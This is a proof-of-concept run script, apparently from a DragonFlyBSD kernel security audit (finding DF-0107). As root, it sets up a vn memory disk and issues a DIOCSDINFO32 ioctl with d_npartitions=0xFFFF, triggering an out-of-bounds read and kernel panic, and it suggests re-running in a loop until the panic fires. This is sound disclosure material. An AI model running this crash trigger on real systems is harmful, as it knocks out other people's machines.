DragonFlyBSD Kernel Audit
DF-0107 / run.sh
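#!/bin/sh
# DF-0107 run script (run on the DragonFly guest AS ROOT -- vnconfig and opening
# /dev/vn0s0 O_RDWR both require root or the operator group; maxx is NOT in
# operator, matching the finding's threat model of root/operator-only access).
#
# Creates an 8 MiB memory disk (vn0), then issues DIOCSDINFO32 with
# d_npartitions=0xFFFF.  The kernel runs dkcksum32() over the ioctl label
# buffer (a 404-byte kmalloc), walking ~1 MiB out of bounds.  When the walk
# crosses a thread-stack guard page the kernel faults:
#
#   panic: vm_fault: fault on stack guard, addr: 0xffff...
#   l32_setdisklabel() at l32_setdisklabel+0x57
#   dsioctl() at dsioctl+0x721
#
# The panic is heap-layout dependent (probabilistic).  On a freshly booted guest
# it typically fires within the first few invocations; on a churned heap it may
# take more.  Re-run until panic, e.g.:
#   for i in $(seq 1 30); do sh run.sh && break; sleep 1; done
#
# Exit status: 1 on any setup failure (message on stderr); otherwise the exit
# status of poc_diocsdinfo, which is only reached when the ioctl returned
# without a panic.
set -e
cd "$(dirname "$0")"

# Diagnostics go to stderr; stdout carries only the "[*]" progress lines.
die() { printf '%s\n' "$*" >&2; exit 1; }

# Check for the PoC binary before touching any disk, so a missing build fails
# fast instead of after vn0 has been configured.
[ -x ./poc_diocsdinfo ] || die "./poc_diocsdinfo not found or not executable"

# Backing file for the memory disk.  A fixed name such as /tmp/oob.img is a
# symlink-following hazard for a script that runs as root, so use mktemp and
# unlink the file on exit.  Re-runs rely on vn0 remaining usable after its
# backing file was unlinked (the previous behaviour as well) -- NOTE(review):
# confirm on the guest if a re-run ever reports vn0s0 missing.
img=$(mktemp /tmp/oob.XXXXXX) || die "mktemp failed"
trap 'rm -f -- "$img"' EXIT
dd if=/dev/zero of="$img" bs=1m count=8 >/dev/null 2>&1 || die "dd failed: $img"

# vnconfig fails when vn0 is still configured from a previous run; that is
# harmless, so its status is ignored and the device-node test below is the
# real check.
vnconfig -c vn0 "$img" >/dev/null 2>&1 || true
[ -e /dev/vn0s0 ] || die "vn0s0 did not appear"

printf '%s\n' "[*] issuing DIOCSDINFO32 with d_npartitions=0xFFFF on /dev/vn0s0"
./poc_diocsdinfo /dev/vn0s0
printf '%s\n' "[*] ioctl returned without panic (try again -- panic is probabilistic)"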